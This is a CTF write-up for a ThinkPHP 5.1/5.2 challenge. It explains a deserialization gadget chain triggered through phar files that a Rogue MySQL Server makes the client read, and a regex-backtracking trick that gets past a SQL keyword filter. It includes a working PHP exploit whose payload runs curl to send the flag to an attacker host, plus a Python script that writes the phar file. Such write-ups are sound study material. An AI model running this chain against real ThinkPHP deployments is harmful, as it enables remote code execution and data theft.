The idea of this challenge comes fromTSec 2019 议题 PPT:Comprehensive analysis of the mysql client attack chain,But the core of the investigation is the tp5.2 deserialization vulnerability mining(Expected solution can be broken tp5.1.x and tp5.2.x).
This point @PHITHON in codebreaking
has been out of the problem.
if(preg_match('/sleep|BENCHMARK|processlist|GET_LOCK|information_schema|into.+?outfile|into.+?dumpfile|\/\*.*\*\//is', $query)) {
die('Go out!!!');
Using the select xx into/*(1000000*a)*/dumpfile;
you can pass it.
A long time ago, @zsx in the articlePhar与Stream Wrapper造成PHP RCE的深入挖掘that LOCAL mysql could trigger Phar Unserialize There is a mention of the local limitations of these two configurations.
However, it is also limited to open_basedir
Which is actually the reason that usingRogue Mysql Server
can only read files in /tmp
In addition, the mysql user needs to have insert
permissions, otherwise an error will be reported.
Therefore, it is not possible to directly execute LOAD DATA LOCAL INFILE
in the challenge to trigger phar unserialize.
@LoRexxar' shared topic at this year's Tsec. In his topic, he mentioned that mysql client
can use any file read to do phar unserialize with trick above.The principle is that when Mysql Client
sends any query statements to Rogue Mysql Server
, Rogue Mysql Server
can reply a file-transfer
request containing the file name it wants to read. And then ask Mysql Client to execute LOAD DATA LOCAL INFILE
statement to read out the file and send it to Rogue Mysql Server. At the moment, we change the filename format to phar://filename
and let it execute the LOAD DATA LOCAL INFILE
statement to trigger phar unserialize.
The first is the entry point
can trigger __toString
Global search __toString
method, follow upthink\model\concern\Conversion
View its toJson
method, Continue to follow up toArray
Let's take a look getAttr
follow up getValue
,The vulnerability is here.
We go back in time$closure,$value,$this->data
$closure = $this->withAttr[$fieldName];
,We can control$this->withAttr
$fieldName = $this->getRealFieldName($name);
follow upgetRealFieldName
default is true,so the incoming string will be returned as is.
Incoming is $name
,Also a parameter $key
of getAttr
,It is also the key name of $data
is the result of the combination of $this->data, $this->relation
, so $closure
is controllable.
Look at $value
and follow up the getData
If $this->data
exists in the $fieldName
key name, the corresponding key value is returned. According to the above analysis, we can just enter the if, and the return value of $value
is the corresponding to $closure
. Key value, so $value
is also controllable.
Looking back at the vulnerability point, $closure, $value
we are all controllable, and $this->data
is an array we use to control the return value of $closure, $value
How can we use it at this time? Example:
I have not carefully looked for other utilization functions, and interested teachers can look for them.
exp: This exp is my source of tp5.1 source construction and 5.2 is a bit different, but can be used directly.
namespace think\process\pipes {
class Windows
private $files;
public function __construct($files)
$this->files = array($files);
namespace think\model\concern {
trait Conversion
protected $append = array("Smi1e" => "1");
trait Attribute
private $data;
private $withAttr = array("Smi1e" => "system");
public function get($system)
$this->data = array("Smi1e" => "$system");
namespace think {
abstract class Model
use model\concern\Attribute;
use model\concern\Conversion;
namespace think\model{
use think\Model;
class Pivot extends Model
public function __construct($system)
namespace {
$Conver = new think\model\Pivot("curl http://vps/ -d '`tac /flag`';");
$payload = new think\process\pipes\Windows($Conver);
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($payload); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
echo urlencode(serialize($payload));
First find the mysql username and password in the source configuration file.
Construct a phar file and use regular expression back track to bypass the limit write file
if(preg_match('/sleep|BENCHMARK|processlist|GET_LOCK|information_schema|into.+?outfile|into.+?dumpfile|\/\*.*\*\//is', $query)) {
die('Go out!!!');
import requests
url = ""
a = 'a'*1000000
data = {
"query": "select 0x123456 into/*{}*/dumpfile '/tmp/smi1e123.phar';".format(a),
"code": "nuk9"
cookie = {
can see that the write is successful.
Use this project Change the file name to phar format
The host is changed to the Rogue-MySql-Server
host, and the username and password are free.
The server nc
, then execute any sql statement to trigger the phar unserialize to receive the flag.
Afterword Since it is similar to ByteCTF and TMCTF, there are not many teachers in this problem. I also encountered many problems when I wrote the question. Although this topic is not very good, I still want to say it is not easy. So I hope the teachers take it seriously.